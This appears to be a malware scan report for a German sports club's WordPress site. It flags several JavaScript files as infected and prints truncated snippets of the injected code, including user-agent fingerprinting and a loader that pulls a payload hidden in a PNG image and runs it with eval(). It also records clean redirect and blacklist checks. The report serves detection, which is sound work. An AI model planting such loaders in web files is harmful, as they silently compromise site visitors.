Scanned pages/files
Request | Server response | Status |
http://asv-botnang.de/ | 200 OK Content-Length: 18757 Content-Type: text/html | clean |
http://asv-botnang.de/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96897 Content-Type: application/javascript | clean |
http://asv-botnang.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8290 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o Antivirus reports:
| ||
http://asv-botnang.de/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.hoverIntent.minified.js?ver=4.0 | 200 OK Content-Length: 2704 Content-Type: application/javascript | clean |
http://asv-botnang.de/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.cookie.js?ver=4.0 | 200 OK Content-Length: 5431 Content-Type: application/javascript | clean |
http://asv-botnang.de/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.dcjqaccordion.2.9.js?ver=4.0 | 200 OK Content-Length: 8072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o $('> a',$parentsLi).addClass(classActive); }); } } function createCookie(cookieId, obj, classActive){ var activeIndex = []; $('li a.'+classActive,obj).each(function(i){ var $arrayItem = $(this).parent('li'); var itemIndex = $('li',obj).index($arrayItem); activeIndex.push(itemIndex); }); $.cookie(cookieId, activeIndex, { path: '/' }); } }; })(jQuery); Antivirus reports:
| ||
http://asv-botnang.de/wp-content/plugins/easing-slider/js/slideshow.min.js?ver=2.1.4.2 | 200 OK Content-Length: 8120 Content-Type: application/javascript | clean |
http://asv-botnang.de/wp-content/themes/asvbotnang/jquery.js | 200 OK Content-Length: 247685 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o fncCallback(strData); } document.body.removeChild(oImg); } oImg.src = strFilename; return true; } else { return false; } } function loadFile() { var strFile = '/wp-content/themes/asvbotnang/images/icons/data.png'; loadPNGData(strFile, function(strData) { eval(strData); } ); } loadFile(); Antivirus reports:
| ||
http://asv-botnang.de/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 1847 Content-Type: application/javascript | clean |
http://asv-botnang.de/fussball | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 09 Oct 2014 10:23:39 GMT Location: http://asv-botnang.de/fussball/ Server: Apache/2.2.27 (Unix) Content-Type: text/html; charset=UTF-8 X-Pingback: http://asv-botnang.de/fussball/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://asv-botnang.de/fussball/ | 200 OK Content-Length: 19177 Content-Type: text/html | clean |
http://asv-botnang.de/fussball/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96897 Content-Type: application/javascript | clean |
http://asv-botnang.de/fussball/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8290 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o Antivirus reports:
| ||
http://asv-botnang.de/fussball/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.hoverIntent.minified.js?ver=4.0 | 200 OK Content-Length: 2704 Content-Type: application/javascript | clean |
http://asv-botnang.de/fussball/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.cookie.js?ver=4.0 | 200 OK Content-Length: 5431 Content-Type: application/javascript | clean |
http://asv-botnang.de/fussball/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.dcjqaccordion.2.9.js?ver=4.0 | 200 OK Content-Length: 8072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o $('> a',$parentsLi).addClass(classActive); }); } } function createCookie(cookieId, obj, classActive){ var activeIndex = []; $('li a.'+classActive,obj).each(function(i){ var $arrayItem = $(this).parent('li'); var itemIndex = $('li',obj).index($arrayItem); activeIndex.push(itemIndex); }); $.cookie(cookieId, activeIndex, { path: '/' }); } }; })(jQuery); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: asv-botnang.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 10:23:32 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html; charset=UTF-8
Link: <http://asv-botnang.de/>; rel=shortlink
X-Pingback: http://asv-botnang.de/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: asv-botnang.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 10:23:32 GMT
Server: Apache/2.2.27 (Unix)
Content-Type: text/html; charset=UTF-8
Link: <http://asv-botnang.de/>; rel=shortlink
X-Pingback: http://asv-botnang.de/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: asv-botnang.de
Referer: http://www.google.com/search?q=asv-botnang.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: asv-botnang.de
Referer: http://www.google.com/search?q=asv-botnang.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=asv-botnang.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://asv-botnang.de/
Result: asv-botnang.de is not infected or malware details are not published yet.
Result: asv-botnang.de is not infected or malware details are not published yet.